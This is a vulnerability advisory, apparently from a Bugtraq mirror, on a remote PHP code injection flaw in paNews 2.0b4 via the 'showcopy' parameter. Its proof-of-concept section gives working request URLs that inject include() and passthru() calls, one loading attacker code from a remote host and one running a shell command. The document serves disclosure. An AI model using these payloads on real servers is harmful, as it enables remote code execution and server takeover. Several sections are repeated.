PANews Remote PHP Script Code Execution Vulnerability
BID:12611
Info
PANews Remote PHP Script Code Execution Vulnerability
| Bugtraq ID: | 12611 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2005 12:00AM |
| Updated: | Feb 21 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to tjomka <[email protected]> |
| Vulnerable: |
PHP Arena paNews 2.0 b4 |
| Not Vulnerable: | |
Discussion
PANews Remote PHP Script Code Execution Vulnerability
PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script.
Reports indicate that when malicious script code is injected, this code can then be forced to execute in the context of the web service that is hosting the affected software.
This vulnerability is reported to affect PaNews version 2.0b4, other versions might also be affected.
PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script.
Reports indicate that when malicious script code is injected, this code can then be forced to execute in the context of the web service that is hosting the affected software.
This vulnerability is reported to affect PaNews version 2.0b4, other versions might also be affected.
Exploit / POC
PANews Remote PHP Script Code Execution Vulnerability
The following examples are available:
Example 1
http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://www.example.com/panews/includes/config.php?nst=http://your/file.php
Example 2
http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://www.example.com/panews/includes/config.php?nst=id
The following examples are available:
Example 1
http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://www.example.com/panews/includes/config.php?nst=http://your/file.php
Example 2
http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://www.example.com/panews/includes/config.php?nst=id
Solution / Fix
PANews Remote PHP Script Code Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PANews Remote PHP Script Code Execution Vulnerability
References:
References:
- paNews Homepage (PHP Arena)
- paNews v2.0b4 - PHP Injection (tjomka